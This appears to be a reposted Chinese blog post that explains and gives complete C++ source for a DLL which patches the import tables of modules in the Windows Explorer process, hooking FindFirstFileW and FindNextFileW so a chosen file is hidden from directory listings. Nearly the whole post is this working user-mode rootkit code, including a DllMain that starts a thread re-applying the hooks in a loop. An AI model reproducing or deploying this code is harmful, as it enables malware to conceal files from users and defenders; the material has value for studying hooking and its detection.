用户态下HOOK API隐藏文件
文章转自王牌软件
站长推荐:NSetup一键部署软件
一键式完成美化安装包制作,自动增量升级,数据统计,数字签名。应对各种复杂场景,脚本模块化拆分,常规复杂的脚本代码,图形化设置。无需专业的研发经验,轻松完成项目部署。(www.nsetup.cn)
只回答业务咨询
站长推荐:NSetup一键部署软件
一键式完成美化安装包制作,自动增量升级,数据统计,数字签名。应对各种复杂场景,脚本模块化拆分,常规复杂的脚本代码,图形化设置。无需专业的研发经验,轻松完成项目部署。(www.nsetup.cn)
突然想写个RING3下隐藏文件的程序,于是花了一天的时间,把我以前写的一个HOOK send的程序改了。
要实现Ring3下隐藏文件,最简单的方法就是HOOK掉Explorer进程里的FindFirstFile和FindNextFile函数,考虑到A和W两个版本,我们应该要HOOK四个函数,但是事实上,我们只要HOOK掉W版本的两个函数就可以了,因为用Dependency看下就能发现Explorer.exe并没有使用FindFirstFileA和FindNextFileA。HOOK API的方法有好多种,我这里用的是HOOK IAT法,也就是遍历Exeplorer进程中的所有模块,凡是模块的导入表中用到FindFirstFileW和FindNextFileW的,就修改FirstThunk数组中对应项的Function地址为MYFindFirstFileW和MYFindNextFileW的地址,再在MYFindFirstFileW函数中调用真实的FindFirstFileW地址,MYFindNextFileW函数类似。以下直接给出源程序,程序中为了安全也可以HOOK掉A版本的函数,只要把//#define HookProA行的注释符号去掉就行。
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 |
[cce_cpp] // Hook FindFile.cpp : 定义 DLL 应用程序的入口点。 // #include "stdafx.h" #include "stdlib.h" #include<windows.h> #include <Dbghelp.h> #include <tlhelp32.h> #include "mydebug.h" #pragma comment(lib, "imagehlp.lib") //不要以\结尾 要隐藏的文件路径 #define HIDEFILE "E:\\abc\\abc.txt" //#define HookProA typedef HANDLE (WINAPI *PFNFindFirstFile)(LPCTSTR lpFileName, LPWIN32_FIND_DATA lpFindFileData ); typedef BOOL (WINAPI *PFNFindNextFile)(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData ); DWORD *MyFindFirstFileWAddr,*FindFirstFileWAddr; DWORD *MyFindNextFileWAddr,*FindNextFileWAddr; #ifdef HookProA DWORD *MyFindFirstFileAAddr,*FindFirstFileAAddr; DWORD *MyFindNextFileAAddr,*FindNextFileAAddr; #endif bool bPathMatch=false; HANDLE WINAPI MyFindFirstFileW(LPCTSTR lpFileName, LPWIN32_FIND_DATA lpFindFileData ) { HANDLE hFind; static WCHAR HidePath[MAX_PATH+1]={0}; int i; /* file_str("---------------------------------------","F:\\temp2.txt"); i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFileName,wcslen((WCHAR *)lpFileName),path,MAX_PATH,0,0); path[i]='\0'; file_str(path,"F:\\temp2.txt"); */ if(wcslen(HidePath)==0) { i=MultiByteToWideChar(CP_ACP,0,HIDEFILE,strlen(HIDEFILE),HidePath,MAX_PATH); while(HidePath[i]!='\\' && i>0) i--; HidePath[i]='\0'; //file_str2(HidePath,"F:\\temp1.txt"); } hFind=((PFNFindFirstFile)FindFirstFileWAddr)(lpFileName,lpFindFileData); if(wcsnicmp((WCHAR *)lpFileName,HidePath,wcslen(HidePath))==0) { bPathMatch=true; //file_str("路径匹配","F:\\temp1.txt"); } else { bPathMatch=false; //file_str("路径不匹配","F:\\temp1.txt"); } /* i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),path,MAX_PATH,0,0); path[i]='\0'; file_str(path,"F:\\temp2.txt"); */ return hFind; } BOOL WINAPI MyFindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData) { BOOL bReturn; static WCHAR HideName[MAX_PATH+1]={0}; int i,j; bReturn=((PFNFindNextFile)FindNextFileWAddr)(hFindFile,lpFindFileData); if(bPathMatch) { if(wcslen(HideName)==0) { i=MultiByteToWideChar(CP_ACP,0,HIDEFILE,strlen(HIDEFILE),HideName,MAX_PATH); HideName[i]='\0'; while(HideName[i]!='\\' && i>0) i--; i++; j=0; while(HideName[i]!='\0' && i<MAX_PATH) { HideName[j]=HideName[i]; i++;j++; } HideName[j]='\0'; //file_str2(HideName,"F:\\temp1.txt"); } while(wcsnicmp((WCHAR *)lpFindFileData->cFileName,HideName,wcslen(HideName))==0) { bReturn=((PFNFindNextFile)FindNextFileWAddr)(hFindFile,lpFindFileData); //file_str("需要隐藏","F:\\temp1.txt"); if(bReturn==false) break; } } //i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),name,MAX_PATH,0,0); //name[i]='\0'; //file_str(name,"F:\\temp2.txt"); return bReturn; } //---------------------------------------------------- #ifdef HookProA HANDLE WINAPI MyFindFirstFileA(LPCTSTR lpFileName, LPWIN32_FIND_DATA lpFindFileData ) { HANDLE hFind; static char HidePath[MAX_PATH+1]={0}; int i; /* file_str("---------------------------------------","F:\\temp2.txt"); i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFileName,wcslen((WCHAR *)lpFileName),path,MAX_PATH,0,0); path[i]='\0'; file_str(path,"F:\\temp2.txt"); */ if(strlen(HidePath)==0) { strcpy(HidePath,HIDEFILE); i=strlen(HidePath); while(HidePath[i]!='\\' && i>0) i--; HidePath[i]='\0'; //file_str2(HidePath,"F:\\temp1.txt"); } hFind=((PFNFindFirstFile)FindFirstFileAAddr)(lpFileName,lpFindFileData); if(stricmp(lpFileName,HidePath)==0) { bPathMatch=true; //file_str("路径匹配","F:\\temp1.txt"); } else { bPathMatch=false; //file_str("路径不匹配","F:\\temp1.txt"); } /* i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),path,MAX_PATH,0,0); path[i]='\0'; file_str(path,"F:\\temp2.txt"); */ return hFind; } BOOL WINAPI MyFindNextFileA(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData) { BOOL bReturn; static char HideName[MAX_PATH+1]={0}; int i,j; bReturn=((PFNFindNextFile)FindNextFileWAddr)(hFindFile,lpFindFileData); if(bPathMatch) { if(strlen(HideName)==0) { strcpy(HideName,HIDEFILE); i=strlen(HideName); while(HideName[i]!='\\' && i>0) i--; i++; j=0; while(HideName[i]!='\0' && i<MAX_PATH) { HideName[j]=HideName[i]; i++;j++; } HideName[j]='\0'; //file_str2(HideName,"F:\\temp1.txt"); } while(stricmp(lpFindFileData->cFileName,HideName)==0) { bReturn=((PFNFindNextFile)FindNextFileAAddr)(hFindFile,lpFindFileData); //file_str("需要隐藏","F:\\temp1.txt"); if(bReturn==false) break; } } //i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),name,MAX_PATH,0,0); //name[i]='\0'; //file_str(name,"F:\\temp2.txt"); return bReturn; } #endif //////---------------------------------------------------------- void IATFind(DWORD *FromAddr,DWORD *ToAddr,const char *module) { PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor; PIMAGE_THUNK_DATA pThunkData; ULONG uSize ; DWORD *Addr2; DWORD dwOLD; MEMORY_BASIC_INFORMATION mbi; HMODULE hMod=GetModuleHandle(module); pImportDescriptor=(PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToData(hMod,true,IMAGE_DIRECTORY_ENTRY_IMPORT,&uSize); if(!pImportDescriptor) return; while(pImportDescriptor->Name) { char *szModName = (char *)((PBYTE)hMod+pImportDescriptor->Name) ; if(stricmp(szModName,"kernel32.dll")==0) { //file_str("找到kernel32.dll","F:\\temp.txt"); pThunkData = (PIMAGE_THUNK_DATA32)((PBYTE)hMod+pImportDescriptor->FirstThunk) ; while(pThunkData->u1.Function) { //file_str("pThunkData循环","F:\\temp.txt"); Addr2 = (DWORD *)pThunkData->u1.Function ; //file_num((DWORD)Addr2,"F:\\temp.txt"); if((DWORD)Addr2==(DWORD)FromAddr) { //file_str("找到导入","F:\\temp.txt"); VirtualQuery(&(pThunkData->u1.Function),&mbi,sizeof(mbi)); VirtualProtect(&(pThunkData->u1.Function),sizeof(DWORD),PAGE_READWRITE,&dwOLD); WriteProcessMemory(GetCurrentProcess(),&(pThunkData->u1.Function),&ToAddr, sizeof(DWORD), NULL); VirtualProtect(&(pThunkData->u1.Function),sizeof(DWORD),dwOLD,0); break ; } pThunkData++ ; } } pImportDescriptor++ ; } } //--------------------------------------------- void DLLFind() { HANDLE hSnapshot= NULL; MODULEENTRY32 moudle; hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,GetCurrentProcessId()); moudle.dwSize = sizeof(MODULEENTRY32); Module32First(hSnapshot,&moudle); do { //file_str(moudle.szModule,"F:\\temp.txt"); IATFind(FindFirstFileWAddr,MyFindFirstFileWAddr,moudle.szModule); IATFind(FindNextFileWAddr,MyFindNextFileWAddr,moudle.szModule); #ifdef HookProA IATFind(FindFirstFileAAddr,MyFindFirstFileAAddr,moudle.szModule); IATFind(FindNextFileAAddr,MyFindNextFileAAddr,moudle.szModule); #endif } while(Module32Next(hSnapshot,&moudle) ); CloseHandle(hSnapshot); } DWORD WINAPI APIHook(LPVOID lpParameter) { HMODULE h; h=GetModuleHandle("kernel32.dll"); MyFindFirstFileWAddr=(DWORD *)MyFindFirstFileW; FindFirstFileWAddr=(DWORD *)GetProcAddress(h,"FindFirstFileW"); MyFindNextFileWAddr=(DWORD *)MyFindNextFileW; FindNextFileWAddr=(DWORD *)GetProcAddress(h,"FindNextFileW"); #ifdef HookProA MyFindFirstFileAAddr=(DWORD *)MyFindFirstFileA; FindFirstFileAAddr=(DWORD *)GetProcAddress(h,"FindFirstFileA"); MyFindNextFileAAddr=(DWORD *)MyFindNextFileA; FindNextFileAAddr=(DWORD *)GetProcAddress(h,"FindNextFileA"); #endif CloseHandle(h); while(1) { DLLFind(); Sleep(100000); } return 0; } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { if(ul_reason_for_call==DLL_PROCESS_ATTACH) CreateThread(0,0,APIHook,0,0,0); return TRUE; } [/cce_cpp] |
学习日记,兼职软件设计,软件修改,毕业设计。
本文出自 学习日记,转载时请注明出处及相应链接。
本文永久链接: https://www.softwareace.cn/?p=305
